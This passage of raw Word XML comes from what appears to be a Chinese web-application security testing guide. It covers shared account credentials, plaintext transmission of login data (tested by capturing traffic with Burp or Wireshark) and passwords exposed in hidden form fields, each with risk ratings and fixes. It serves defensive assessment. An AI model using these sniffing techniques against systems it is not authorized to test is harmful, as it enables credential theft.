          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：同样的账户名密码可以在多个系统上登录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FA8614" w14:textId="77777777"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353B878B" w14:textId="2CDC1B26" w:rsidR="00757422" w:rsidRPr="00190C71" w:rsidRDefault="00F6188E" w:rsidP="00190C71">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置每个账号的初始密码均不同，且不可预测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFA1323" w14:textId="6ABE3D4A" w:rsidR="00F6188E" w:rsidRDefault="00F6188E" w:rsidP="00190C71">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同业务系统采用不同的账号密码体系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFE7538" w14:textId="3E20A14C" w:rsidR="009325C6" w:rsidRPr="009325C6" w:rsidRDefault="009325C6" w:rsidP="009325C6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009325C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>注意事项：</w:t>
      </w:r>
      <w:r w:rsidRPr="009325C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018EDCB6" w14:textId="5E76E692" w:rsidR="00C92E83" w:rsidRPr="00AD537C" w:rsidRDefault="00C92E83" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc498434490"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证信息泄漏</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="60B5D1CF" w14:textId="34868A2E" w:rsidR="00C92E83" w:rsidRPr="000002DD" w:rsidRDefault="00C92E83" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc498434491"/>
      <w:r w:rsidRPr="000002DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传输过程泄漏</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="1AF1E18D" w14:textId="18986B1D" w:rsidR="00C92E83" w:rsidRPr="00190C71" w:rsidRDefault="00C92E83" w:rsidP="00190C71">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00807A83" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证过程中传输</w:t>
      </w:r>
      <w:r w:rsidR="007C51F2" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未</w:t>
      </w:r>
      <w:r w:rsidR="00807A83" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密（用户名密码</w:t>
      </w:r>
      <w:r w:rsidR="007C51F2" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidR="00807A83" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>敏感数据</w:t>
      </w:r>
      <w:r w:rsidR="007C51F2" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>明文传输</w:t>
      </w:r>
      <w:r w:rsidR="00807A83" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56259F0A" w14:textId="7B43B3D4" w:rsidR="00DD3F85" w:rsidRPr="00190C71" w:rsidRDefault="00C92E83" w:rsidP="00190C71">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00DD3F85" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C61CEB7" w14:textId="3B7DBE32" w:rsidR="00DD3F85" w:rsidRPr="00190C71" w:rsidRDefault="00DD3F85" w:rsidP="00190C71">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到网站或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统登录页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0F46FE" w14:textId="403E3393" w:rsidR="00B713A6" w:rsidRPr="00190C71" w:rsidRDefault="00B713A6" w:rsidP="00190C71">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>通过对网站登录页面的请求进行抓包，工具可用</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wireshark</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>filder</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、等等，分析其数据包中相关</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（密码）参数的值是否为明文。如图利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wireshark</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包分析的密码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E732B21" w14:textId="67307363" w:rsidR="00B713A6" w:rsidRPr="00190C71" w:rsidRDefault="00B713A6" w:rsidP="00190C71">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF1C238" wp14:editId="10389ECA">
            <wp:extent cx="4000500" cy="15621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58D482C5" w14:textId="12936FDD" w:rsidR="00C92E83" w:rsidRPr="00190C71" w:rsidRDefault="00C24790" w:rsidP="00190C71">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00C92E83" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="009C6D75" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者通过在局域网中</w:t>
      </w:r>
      <w:r w:rsidR="00EA1132" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嗅探网络流量，获取明文传输的认证凭证，如用户名密码、</w:t>
      </w:r>
      <w:r w:rsidR="00EA1132" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SESSIONID</w:t>
      </w:r>
      <w:r w:rsidR="00EA1132" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D64C0F" w14:textId="77777777" w:rsidR="00464B28" w:rsidRPr="00190C71" w:rsidRDefault="00C92E83" w:rsidP="00190C71">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E27AA8" w14:textId="501F4A9F" w:rsidR="00737C6D" w:rsidRPr="00190C71" w:rsidRDefault="00737C6D" w:rsidP="00190C71">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00464B28" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传输数据包含明文密码、链接、明文身份证、明文地址等其他敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CB5F9D" w14:textId="78966769" w:rsidR="00464B28" w:rsidRPr="00190C71" w:rsidRDefault="00464B28" w:rsidP="00190C71">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式明文传输用户名密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A005C3" w14:textId="54E64686" w:rsidR="00C92E83" w:rsidRPr="00190C71" w:rsidRDefault="00464B28" w:rsidP="00190C71">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者用户身份标识，以</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式显示在</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E9F37A" w14:textId="70D6DA82" w:rsidR="00C92E83" w:rsidRDefault="00C92E83" w:rsidP="00190C71">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00A23DC8" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议按照网站的密级要求，需要对密码传输过程中进行加密得使用加密的方式传输，如使用</w:t>
      </w:r>
      <w:r w:rsidR="00A23DC8" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidR="00A23DC8" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00A23DC8" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00A23DC8" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但加密的方式增加成本，或许会影响用户体验。如果不用</w:t>
      </w:r>
      <w:r w:rsidR="00A23DC8" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTPS</w:t>
      </w:r>
      <w:r w:rsidR="00A23DC8" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以在网站前端用</w:t>
      </w:r>
      <w:r w:rsidR="00A23DC8" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Javascript </w:t>
      </w:r>
      <w:r w:rsidR="00A23DC8" w:rsidRPr="00190C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做密码加密，加密后再进行传输。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197C1C7D" w14:textId="4F89FC0B" w:rsidR="00DF1D95" w:rsidRPr="00190C71" w:rsidRDefault="00DF1D95" w:rsidP="00190C71">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8EE2F3B" w14:textId="4FEEFF25" w:rsidR="00757422" w:rsidRPr="000002DD" w:rsidRDefault="00C92E83" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc498434492"/>
      <w:r w:rsidRPr="000002DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话变量泄漏</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="7C3E6630" w14:textId="60F4F7D4"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00E94A00" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录、验证等页面的隐藏域中存在密码信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E32857" w14:textId="66377779"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00E7263A" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看网页源代码</w:t>
      </w:r>
      <w:r w:rsidR="004C3D22" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，寻找</w:t>
      </w:r>
      <w:r w:rsidR="00CC3C0E" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐藏域</w:t>
      </w:r>
      <w:r w:rsidR="004C3D22" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中是否存在</w:t>
      </w:r>
      <w:r w:rsidR="005E7412" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidR="001B47FD" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidR="005E7412" w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息。</w:t>
      </w:r>
    </w:p>
